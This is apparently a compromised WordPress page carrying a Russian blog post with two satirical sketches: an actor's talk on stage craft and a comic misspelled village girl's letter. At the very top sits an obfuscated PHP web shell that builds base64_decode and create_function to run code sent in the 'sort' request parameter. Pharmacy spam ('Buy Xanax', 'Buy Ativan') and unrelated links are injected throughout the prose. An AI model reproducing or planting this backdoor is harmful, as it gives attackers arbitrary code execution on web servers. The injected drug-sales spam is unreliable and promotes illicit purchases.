nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

ДВА РАССКАЗА-НАБРОСКА НАШЕГО СЫНА


http://soligenix.com/author/smillen/page/8/ Малый театр
                                                                                                                                                             
      ( писал,  в с ё   придумав, в  отличие   от   меня,  молодой  человек,  которому  на   тот   момент  было едва  после  двадцати.
С  его  разрешения  я  поместила  это  сюда,  в  свой  ЖЖ. мама )

Недавно я был приглашён на творческий вечер одного известного актёра. Не буду вам называть его имени.

Скажу лишь, что ещё в детстве с мамой мы ходили на его спектакли, еле достав билеты. Я был приятно удивлён случившемуся.
      В обычной жизни, он, такой немногословный, вдруг разговорился. Да так, как-будто всю свою жизнь копил, вынашивал, шлифовал всё то, что он в один момент смог нам сказать.  Но  – да, он — такой!
     Удивление от открытого по-новому мира — причина, по которой я всегда хочу аплодировать, когда речь заходит о нём.  К счастью, годы знакомства с ним уже сделали меня проницательным, и я был готов к сюрпризу. У меня с собой было записывающее устройство, именно поэтому большую часть его речи я смогу привести здесь дословно, другую часть — приблизительно, по смыслу.
    Начал он её совершенно внезапно, в игривой форме, поэтому я не сразу включил запись.
    Начал словом —

Жизнетворчество
………………………………………………………………………………………..

И я разговаривал со множеством актёров разных жанров и задавал им один и тот же вопрос:
«Как ты относишься к этому герою, которого играешь?»
Некоторые ответы были разными: относительно персонажа, о котором шла речь, и актёра, с которым я разговаривал; а  некоторые — схожими между собой.
Схожими тем, что вопрошаемый «заявлял» мне, что его герой это не  "третье лицо", а он сам, "первое  лицо", я – это  он.
Меня такой ответ расстраивает.
И не только потому что на этом разговор заканчивается. А и потому что для любого актёра, даже для самого талантливого, прожить роль своими собственными чувствами — это невероятный, саморазрушительный труд. Этот труд не идёт ни в какое сравнение с истинной актёрской игрой. Такой  землекопный  труд  сжигает жизненный ресурс, а значит, и творческий потенциал артиста. И мне от этого становится очень тяжело, потому что все талантливые люди — они мне не просто коллеги, с которыми мы занимаемся общим делом, они — мои родные. Именно родные.
Я прошёл этот путь с самого начала. Все ступеньки — одну за одной. Поэтому ошибочно то мнение, что человек, который своим  землекопным  трудом достигнув какого-нибудь результата, застыл с высоко задранной головой. Нет, смотрит он, действительно, уже иначе, но если мы говорим о человеке, да ещё и артисте, то он прекрасно помнит, что значит пробежать из кулисы с копьём, не сказав ни слова, после чего идти снимать грим или переодеваться в другого молчуна.
Во-сколько раз сильней любая критика для такого актёра! Как разрушительно для него, в таком случае, поражение! Даже самое простое –  неудачная репетиция. Представить себе трудно, сколько  каждый раз  уходит у него сил на успокоение и восстановление, чтобы выйти в следующий раз на сцену.
Нельзя же пробежать по сцене с копьём точно так  же, как с лопатой по огороду. Для меня это так же немыслимо, как ходить по огороду с копьём. Вот  два,  совершенно  разных  определения  творческой  деятельности.  Говорят:  он – баритон ( или  тенор  и  т.п.). Или: http://persquaremile.com/2012/12/18/you-are-the-real-winner-of-the-mobile-maps-wars/?share=digg у  него баритон ( у  него тенор  и  т.п.). Есть  разница ?  Артист  с  копьём   или  " четыре  копья  бегут  во  вторую  кулису !". . .
«Играть» – это значит быть в роли, а не «быть ролью» (" копьём "),  и давать ей  быть  тобой. «Вошёл» в  роль, «вышел» из  роли — вот  и  вся  игра, дело  техники.
По-настоящему проживать жизнь своего героя — это уже не театр. Это в прямом смысле слова — "само деятельность". *
Мне повезло – все мои герои мне близки, поэтому я их знаю даже лучше, чем самого себя. Знаю «как облупленных».
И с некоторыми их проявлениями я согласен, а что-то в них мне просто отвратительно!
Сейчас надо заметить, что я не задумываюсь о трактовке. Точнее, я вообще, если честно, не знаю, что это может значить в нашем деле.
Какие-то сцены моего героя я переживаю вместе с ним, потому что они мне также близки по характеру, как и ему. Какие-то — напротив. Я испытываю омерзение за подлость, предательство, жадность, жалость к себе, за зазнайство, пустую самоуверенность, вобщем, за всё то, с чем мы сталкиваемся и боремся каждый день.
И когда приходит черёд моему герою поступить нечестно, бессознательно, я уже не с ним, в этот момент я становлюсь к нему беспощаден.
И опять-таки, до тех пор, пока не придёт черёд ему одуматься, дальше мы с ним снова вместе.
Наверно, это критики и называют интерпретацией, трактовкой.
А это всего-лишь навсего и есть тот момент разоблачения. Когда обличие, персона, маска приоткрывается и из под неё выглядывает моё лицо — лицо обычного человека, который не может мириться с гадством.
И поэтому раскаяние в партии своего героя я сопереживаю вместе с ним, сочувствуя ему, но и именно поэтому же я полностью согласен с автором, который часто после раскаяния заканчивает линию этого персонажа.
Сценическое существование от  бытового  отлично ещё и тем, что в нём всегда всё должно быть выпукло, ярко, громко, чётко, понятно, должно быть ещё красивей, чем это бывает в повседневной жизни, чтобы сидящий или стоящий на самом дальнем от сцены краю галёрки смог забыть о том, кто он и где он сейчас находится.
Когда я на сцене, в реальном времени — тогда, конечно, нет такой возможности, как сейчас, «раскладывать образ моего героя по полочкам или держать его хотя бы на расстоянии вытянутой руки».
Но это тогда и не надо. Даже наоборот — недопустимо. **
Я одеваюсь в «его» костюм, говорю «его» слова, делаю «его» поступки.
(на письме это «я» надо бы было обвести контуром или добавить к нему тень – так я себе это представляю)
И зритель всегда чувствует волшебство.
Волшебство творения.
Только оно и работает. Только им и можно воздействовать на зрителя.
Только оно и способно его увлечь.
Именно увлечь. И уже там, на примере давно всеми изученного сюжета, заставить, заинтересовать, убедить прожить, как в первый раз, все радости и горести. Да так, чтобы сейчас, в этом театре, было сильнее, чем это бывает в  его  повседневной  жизни. Это, конечно, в лучшем случае.
И, по возможности, добиться нашей главной, главнейшей задачи актёра — обратить, внимание зрителя на самого себя, на его, зрителя, на   его  собственную жизнь. Какой бы она ни была. Заставить его ещё раз вспомнить и задуматься о жизни, морали, о смерти, о Любви.
Мы созданы Господом по «Его образу и подобию». И подобие наше в создании! Мы можем   с о з д а т ь   «образ».
Жаль, что мы не всегда об этом знаем и задумываемся.
Но даже, когда мы думаем о салате, который будем делать на ужин: думаем о продуктах для него, о способах реализации — мы   с о з д а ё м.  И между моментом возникновения идеи до конца её реализации — мы, в своей мизерности, уподоблены Всевышнему.
На самом деле! Мысль  очень часто  бывает убедительнее реальности, да и что считать реальностью?
………………………………………………………………………..
Да, вот вы смеётесь, а ведь…
Напрасно я вас рассмешил. Теперь тяжело мне будет серьёзно продолжать…
Ведь как бывает:
Сон приснится особенно впечатлительному человеку, такой сон, какой-нибудь, и уж больно убедительный. И просыпается человек «под впечатлением», что называется. А потом, понял, что проснулся и думает – «Эх, и приснится же!.. А сон какой интересный, ну ведь, надо же! А? Вот, досмотреть бы!»
Утром встанешь не с той ноги, и началось:
С улицы гул!
Окно — не то что открыть, смотреть даже не хочется, противно.
Рубашка — мятая,
Погладил — да, всё-равно как-то не так.
Выходишь из дверей — запах какой-то в парадной противный,
На улицу — духота.
И вот — только что поглаженная (как-то не так) рубашка, стала просто мокрой.
Столько сразу эмоций, что внимание уже  не управляемо  стало.
Светофор — перед носом прямо, бац — красный.
Зелёный — а ты спишь, и тут тебя уже плечом кто-нибудь сзади задел, хряк.
Ещё хмурнее стало внутри. Идёшь, думаешь, что утром были — цветочки.
А тут ещё, вдруг, в твою сырую рубаху тинейджер какой-то отмороженный айскримом — «Ой, дяденька, пардоньте».
Ты думаешь, наверно, ещё не проснулся — так не бывает: сначала — рубища эти, марево, потом — перекрёсток с нечистой силой, сопляк с брикетом…
Ты и прогнать в голове не успел, а в тебя уже окурок из окна летит.

Или бывает поздно уже, а к любимой женщине спешишь, радуешься сильно, с ней хочешь разделить счастье своё. И всё тебе нипочём!
«Нет преград! Как я рад! Так я рад!» – такое вот что-то внутри тебя играет.
И ты себе веришь! Ведь нет оснований не верить — желание доброе, искреннее.
На часы смотришь – «О, на мосты, слава Богу, успеваю!»
Бегом-бегом. И всё тебе — нипочём.
Потом к ней прибегаешь, а время-то у тебя на часах неправильное: только прилетел, перевести забыл, радовался сильно.
Чего… у меня так было. Дважды: раз — на час вперёд, другой — на два назад.

Скáжите – «Совпаде-ение!»
Нет, дорогие мои, я знаю Бога, и поэтому для меня не бывает совпадений.

*
Я много искал, и, конечно пробовал, и этот путь. Но вот, что у меня получилось.
(Юбиляр стал показывать различные отрывки из своих ролей, на примере которых показывал тот и другой вариант.)
И вот мне в этом образе надо удивиться. Ну вот так я удивляюсь дома. Понятно, что на сцене это недопустимо, потому что вы, наверно, даже не заметили, что я показал. Но я – правда: удивляюсь именно так.
Нарисуем это пожирнее.
Вы видите, что получилось. Это естественно для телекамеры, но удивляться на сцене, развивая мою бытовую «линию удивления» — бесполезно — сил потрачу много, скорей всего ещё отвлекусь на что-нибудь. Когда ты не органичен — ты уязвим!
Или, что ещё больше доказывает сказанное — смех.
Вот вы теперь слышали как я смеюсь. И, я заметил, что вам самим становится смешно, когда вы его слышите.
И что мне с этим делать на сцене? Как мне смеяться играя?
С микрофоном это, допустим, ещё как-нибудь и можно было бы приловчиться, проделать.
Но надо ведь без. А когда я это делаю громко, то оно просто не прилично.
А как я отказываюсь от чего-нибудь предлагаемого — вот таким вот мотком головы. Усилим для сцены. Робот. Опять смешно.
Точно так же, начав убавлять мощность сценических жестов и громкость голоса, мы не получим бытового.

**
(Маэстро заговорил с кем-то из первых рядов зрительского зала.)
·         … ?
·         …конечно, я в образе, то есть я вместе с героем, одноврéменно.
Или — одновремéнно — как Вам угодно.
·         … ?
·         Мне? Мне важна суть, а не оболочка. Поэтому — как Вам угодно.

Buy Ativan Lorazepam Особа Машка

Buy Zithromax Online Fast Shipping Здраствуйте  уважаемоя  редакция  газеты  «ТАК  НАДО ».
Buy Real Diazepam Online Uk Пишет  Вам  Маша  Клинова  14 лет, ученица 8  класса  средней  образовательной  Кальяновской  школы.
http://terranealife.com/october-terranea-turns-pink-support-research-play-p-n-k/ Это  потому  что  я  слышала  как  папинька  сказал – ,,Что  все  эти  дакументы  с  центра,  или  может  даже  с  ещё  откудава  подальше,,.
Я  вкратце, напишу  письмо , к  вам, хоть  моя  Маменька  Ольга  Романовна  Клинова  по  мужу  и,  наказала  меня отправить   дакументы  в   редакцию  под  анамимным  именем  меня. Потомушто,  мы  с   ёй  между  собой  и,  догаваривались  и   што, будем  непризнаватца   если   што.  Да  потомушто,  Федька  назло  разарвал  дакументы  и  хотел  их  сжеч,  а   я  ему тогда  и,  сказала  што, вот  как – .. Пусть  сам  папинька  их  окаянных  и  сожжот  когда  будет  печку  затоплять.  Ведь папинька   не   знает   што,  мы   в  печку   насували  не   газету   а,  дакументы   и,  штопотом  когда  папинька  если  спросит  – ,,што  наврятли,, –  сказал  Федька.  Мы   ему   тут,   тогда   и   сможем  сказать – ,,Мол  наверно  он  их  изжог  когда  печку растоплял,, –  сказала  я  Федьке.

Buy Zopiclone Next Day Delivery Uk И,  их  я  выттянула  когда  Федька  паразит  ушол   и,  схоронила  документы  а,  он то   курить   тогда   ушол. !  Потому  што,  он  я   знаю   курит  у  папинькиного  друга   Дяди  Коли  подворует  окурок  и   за  дравинеком  смолит  его  весь.  Это  у  меня информация  про  запас.  Папинька  говорит  што – ,,Должён  всегда  быть  в  рукаве  козырный  тузец,,. Вот  у  меня  на  Федьку гадёныша  нашего  есть  такой  тузец.

Наша  деревня  Кальяново  порядочно-большая  и  многие  даже  которые  далеко  от  неё  живут  о  ней  ровно  знают  всё.  И это  вовсе  не  спроста   а,  потому   што,  есть   в   ней   и   какойто  манящий   дурман  как,  Папинька  говорит.  И  што,  все  мимо  не  просто  так  проежжают  а,  останавливаются  завсегда  где  нибудь   хоть  на  скока.
Это   мимо  нас  проездом   теливизионьщики   впозатом  году  были.  И   после  впозатомже  году   даже   показали   по  теливизеру  дом  Бабы  Кати  Длиннной.  Потому  что  у   ёй   там  много  разных  цветов   росло   возле   дома.  А   наш   дом  тоже  рядом  с  бабы  Катиным  только  с  другой  стороны  и  влево  ещё.
http://ectarc.com/ А  ещё  в  позатом  году  были  кловуны  из   раёна, которых  теливизионьщики  освещать  писали. Только  ихние   выступление не  показали  потому  што, они  все  были  сильно   выпивши   и   писать  не   могли   ни   лыка.  А   Федька   ещё   сказал   про  них   так – ,,Што,  актёры  были  в  сраку  ужратыеся,  потомушто,  в   Ваньки  Хомутова  сына   останавливались   и   садили  с   ним  два   дня –  ,,и  ночи  не  закрывая  очи,, –   а   это   какраз   я   ему   тут   наверно   и   могу  поверить   потому   как  Хамутёнок  у  нас   в   деревне   очень – ,,яркая   Персона,, –  так   Маменька   про   него   всегда   говорит.  Так  что  Федька   хоть   и   паразит  редкосный   да,  всёже   его   харе   нахалообразной   можно  иногда  с   доверием   поверить.

http://12twenty.com/index/ Репортёр  когда  через  забор   его  перелезал  ночью   выранил   дакументы  видать.  А   Федька   хоть   прок  какой  от  него подобрал  –  Маменька   тут  права  точно  про  Федьку.
Buy Xanax Vietnam Тока   это   же   он   их   и   разорвёт !  же   тока  уже  потом.  А   я   их   обратно   собрала  снова  на  картоне  по  порядку   уже   как  они  до  того  были   как   их   паразит  этот  неразорвал   и,  на   клей   хорошенько   вот   так   подсадила   намертво   уже  теперь   наверное. ,,Уже  если  и  не  то  на  века  то  на пол  так  точно,, –  как  папинька  наш   говоривает.
А  мне  в   школе  говорят  не  надо  тебе  и  учитса  особа   Машка  у  тебя   голос  есть    и   ты   мол  в   город   поедиш   да  как   там   как   спОЁшш !  Тебя   как  споеши  возьмут  куда  надо  с   такимто  голосом  то. ,,Куда-угодно  с   такимто  голосом  то  возьмут  и   спасибо   всем   скажут,, –  это   про   меня   так   люди   говорят   я   сама   вам   врать   не   буду.
Так  вот  я  о   будующем   думаю.  Папинька-то   рад  потому   как   Федька-то  в  текникуме  на   учителя   будет   а   мне   тоже  надо  куды-то  бы  пристроится.  Правильно  я   с   Маменькой  так  думаем.
,,Поэтому  мне  про  актёровские  дакументы  забота  может  шансом  стать  на  милион !  Или   медаль   дадут,, !! –  Маменька  говорила – ,,Надо позаботится,, .  Ну   Папинька  тут  ей  сразу  сказал   што,  мы   с   Маменькой   две   дуры  на   одну   егоную  с   Федькиной  голаву  ,,- и,  што,- ,,Ненада  эти   дакументы   отправлять   никуда   от  греха,, –  и,  што, –  ,,Мол  коли   надо  было  бы   вернулись   бы   эти   Дятлы   Варёные  со   своего   раёна   или   откудова   вы   там   и   забрали   бы   всё   и  уехалибы  – а  ,,спасибо!,,  –  в  карман   не  положиш   и   ничего   вообще…  Впрочем  как  у  вас  и  бывает  это  обыно,,.  И   потом   ещё   Папинька   говорил   што,   Вы   и   страну   всю  в  телевизерех  нашу   проржали .
Тока   тут  я   ему  уже  с   Маменькой  мы   вместе  и,  не   верим. Он   старый   уже   и,   завирается   сильно   больно   бывает.

 


Добавить комментарий